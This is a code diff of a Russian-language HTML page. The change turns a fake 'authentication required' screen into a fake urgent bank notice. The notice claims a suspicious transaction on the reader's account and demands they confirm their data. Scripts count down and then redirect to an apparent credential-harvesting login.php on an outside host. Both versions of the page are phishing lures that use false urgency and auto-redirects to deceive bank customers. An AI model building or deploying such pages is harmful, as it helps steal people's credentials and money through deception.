--- a/defferedredirects3.html
+++ b/defferedredirects3.html
@@ -1,22 +1,35 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Проверка подлинности</title>
-    <meta http-equiv="refresh" content="10;url=https://cf-4.nxnrllbe.eu.org/">
+    <title>Срочное уведомление от банка</title>
+    <script>
+        setTimeout(function() {
+            window.location.href = "https://server1850568.netart.com/scom/login.php";
+        }, 8000);
+    </script>
     <style>
-        body { font-family: Arial, sans-serif; background: #e8f4f8; padding: 50px; }
-        .auth-box { background: white; border: 2px solid #4285f4; border-radius: 8px; padding: 30px; max-width: 500px; margin: 0 auto; }
-        .logo { color: #4285f4; font-size: 24px; font-weight: bold; margin-bottom: 20px; }
+        body { font-family: Arial, sans-serif; background: #004a7c; color: white; padding: 30px; }
+        .bank-notice { background: #005b96; padding: 40px; border-radius: 10px; border: 3px solid #ffd700; }
+        .urgent { color: #ffd700; font-weight: bold; font-size: 20px; }
+        .timer { background: #ffd700; color: #004a7c; padding: 10px; border-radius: 5px; display: inline-block; margin: 10px 0; }
     </style>
 </head>
 <body>
-    <div class="auth-box">
-        <div class="logo">🔐 SecureAuth</div>
-        <h2>Требуется проверка подлинности</h2>
-        <p>Система безопасности обнаружила необычную активность.</p>
-        <p>Для продолжения работы необходимо подтвердить вашу личность.</p>
-        <p>Автоматическое перенаправление через 10 секунд...</p>
-        <p><a href="https://cf-4.nxnrllbe.eu.org/">Перейти сейчас</a></p>
+    <div class="bank-notice">
+        <h1>🏦 СРОЧНОЕ УВЕДОМЛЕНИЕ</h1>
+        <p class="urgent">Обнаружена подозрительная операция по вашему счету</p>
+        <p>Для предотвращения несанкционированного доступа необходимо немедленно подтвердить ваши данные.</p>
+        <div class="timer">Перенаправление через: <span id="countdown">8</span> сек</div>
+        <p><small>Если перенаправление не сработало, <a href="https://server1850568.netart.com/scom/login.php" style="color: #ffd700;">нажмите здесь</a></small></p>
     </div>
+    
+    <script>
+        let countdown = 8;
+        setInterval(function() {
+            countdown--;
+            document.getElementById('countdown').textContent = countdown;
+            if(countdown <= 0) countdown = 0;
+        }, 1000);
+    </script>
 </body>
 </html>
